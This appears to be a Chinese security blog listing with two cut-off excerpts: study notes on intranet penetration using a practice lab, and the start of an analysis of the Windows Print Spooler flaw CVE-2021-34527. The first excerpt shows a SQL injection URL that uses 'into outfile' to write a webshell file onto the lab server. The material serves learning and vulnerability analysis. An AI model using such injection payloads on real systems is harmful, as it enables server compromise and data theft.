内网穿透(上)——学习笔记
以猫舍靶场为例连接木马http://afsgr16-b1ferw.aqlab.cn/?id=1%20and%201=2%20union%20select%201,”” into outfile ‘C:/phpStudy/WWW/123.php’ into outfile 这个函数是用来导出文件的。 把数据库得到的结果导出到某个文件(就是把这个一句话木马写入123.php里面然后通过i
Windows Print Spooler 服务最新漏洞 CVE-2021-34527 详细分析
2021年07月12日 漏洞分析作者:天融信阿尔法实验室原文链接:https://mp.weixin.qq.com/s/8qDQUu6FNpNjX1tY1KrAoQ近日,有安全研究员在github上公开了”CVE-2021-1675”的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文